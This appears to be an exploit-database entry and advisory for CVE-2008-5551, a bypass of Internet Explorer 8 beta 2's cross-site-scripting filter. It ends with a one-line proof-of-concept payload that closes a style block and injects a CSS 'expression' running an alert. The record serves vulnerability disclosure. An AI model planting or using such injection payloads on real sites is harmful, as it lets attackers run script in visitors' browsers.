Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass

Author: Rafel Ivgi
type: remote
platform: windows
port: 
date_added: 2008-12-11  
date_updated: 2014-04-02  
verified: 1  
codes: CVE-2008-5551;OSVDB-57062  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32654.txt  
source: https://www.securityfocus.com/bid/32780/info

Microsoft Internet Explorer is a web browser for the Microsoft Windows operating system.

Internet Explorer 8 includes a cross-site-scripting filter that is designed to prevent cross-site-scripting attacks against vulnerable web applications. Attackers may be able to bypass this filter under certain conditions, such as by taking advantage of an existing vulnerability in a web application.

Internet Explorer 8 beta 2 is vulnerable.

} BODY{a:expression(alert(&#039;hi&#039;))};</style>***<style>***